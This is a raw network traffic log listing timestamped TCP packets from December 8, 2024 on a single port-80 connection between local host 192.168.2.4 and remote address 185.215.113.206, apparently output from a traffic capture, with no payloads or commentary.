Dec 8, 2024 19:52:27.692069054 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.692847013 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.692890882 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.692918062 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.692998886 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.693634987 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.693681002 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.693706989 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.693747044 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.694394112 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.694432974 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.694506884 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.694551945 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.695158958 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.695202112 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.695358038 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.695401907 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.696053982 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.696096897 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.696290970 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.696332932 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.696785927 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.696825981 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.696969032 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.697011948 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.697645903 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.697689056 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.697822094 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.697861910 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.698446035 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.698488951 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.698599100 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.698642969 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.699232101 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.699274063 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.699341059 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.699383020 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.700057030 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.700098991 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.700175047 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.700215101 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.700906992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.700968981 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.700988054 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.701028109 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.701719046 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.701765060 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.701828957 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.701868057 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.702517986 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.702558994 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.702639103 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.702681065 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.703360081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.703402996 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.703469992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.703511000 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.704144955 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.704189062 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.704281092 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.704324007 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.705081940 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.705126047 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.705143929 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.705179930 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.705797911 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.705841064 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.705862999 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.705907106 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.706631899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.706677914 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.706753969 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.706881046 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.707411051 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.707449913 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.707482100 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.707524061 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.708231926 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.708283901 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.708363056 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.708404064 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.709031105 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.709074974 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.709197998 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.709235907 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.709815979 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.709858894 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.709964037 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.710005999 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.710701942 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.710746050 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.710890055 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.710937977 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.711568117 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.711628914 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.711774111 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.711813927 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.712244034 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.712290049 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.861587048 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.861656904 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.861773014 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.861888885 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.862087011 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.862138033 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.862736940 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.862782955 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.862803936 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.862907887 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.863522053 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.863590002 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.863626957 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.863675117 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.864346981 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.864388943 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.864471912 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.864516973 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.865144014 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.865183115 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.865251064 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.865299940 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.865964890 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.866013050 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.866028070 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.866070032 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.866772890 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.866818905 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.866874933 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.866911888 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.867645025 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.867690086 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.867748976 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.867822886 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.868637085 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.868690968 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.868777990 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.868828058 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.869637966 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.869682074 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.869705915 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.869744062 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.870244980 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.870284081 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.870357990 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.870400906 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.870938063 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.870955944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.870982885 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.870992899 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.871665001 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.871711969 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.871743917 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.871784925 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.872469902 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.872512102 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.872518063 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.872560978 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.873313904 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.873357058 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.873503923 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.873543978 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.874068022 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.874108076 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.874172926 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.874217033 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.874895096 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.874939919 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.874989033 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.875030041 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.875721931 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.875767946 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.875797987 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.875840902 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.876552105 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.876600027 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.876677036 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.876718998 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.877332926 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.877376080 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.877432108 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.877473116 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.878159046 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.878201962 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.878221989 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.878262043 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.878963947 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.879010916 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.879102945 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.879147053 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.879777908 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.879821062 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.879903078 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.879946947 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.880631924 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.880676031 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.880745888 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.880788088 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.881424904 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.881464958 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.881535053 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.881577969 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.882236958 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.882282972 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.882428885 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.882478952 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.883049965 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.883093119 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.883155107 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.883197069 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.883845091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.883910894 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.883940935 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.883984089 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.884756088 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.884799004 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.884913921 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.884953022 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.885497093 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.885543108 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.885627031 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.885675907 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.886270046 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.886313915 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.886368036 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.886409044 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.887101889 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.887145042 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.887145996 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.887182951 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.888042927 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.888084888 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.888086081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.888129950 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.888744116 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.888786077 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.888807058 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.888849020 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.889584064 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.889627934 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.889641047 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.889682055 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.890360117 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.890403986 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.890474081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.890516996 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.891159058 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.891201019 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.891247988 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.891288996 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.892060041 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.892106056 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.892199039 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.892240047 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.892784119 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.892827988 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.892877102 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.892915010 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.893625975 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.893671989 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.893737078 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.893779993 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.894454956 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.894535065 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.894593000 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.895265102 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.895311117 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.895373106 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.895456076 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.896045923 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.896091938 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.896143913 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.896184921 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.896862030 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.896913052 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.897051096 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.897093058 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.897689104 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.897726059 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.897977114 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.898016930 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.898595095 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.898637056 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.898776054 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.898817062 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.899473906 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.899528027 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.899691105 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.899736881 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.900312901 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.900330067 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.900357008 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.900367975 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.900943041 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.900989056 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.901037931 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.901079893 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.901927948 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.901964903 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.901972055 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.901998043 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.902568102 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.902612925 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.902774096 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.902820110 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.903363943 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.903402090 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.903405905 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.903438091 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.904124022 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.904169083 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.057163954 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.057219028 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.057220936 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.057254076 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.057374001 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.057411909 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.057426929 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.057457924 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.058161974 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.058248043 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.058296919 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.058332920 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.059125900 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.059171915 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.059235096 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.059269905 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.059808969 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.059853077 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.059884071 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.059921980 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.060606956 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.060650110 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.060688972 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.060730934 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.061371088 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.061405897 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.061556101 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.061595917 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.062190056 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.062232971 CET	49748	80	192.168.2.4	185.215.113.206
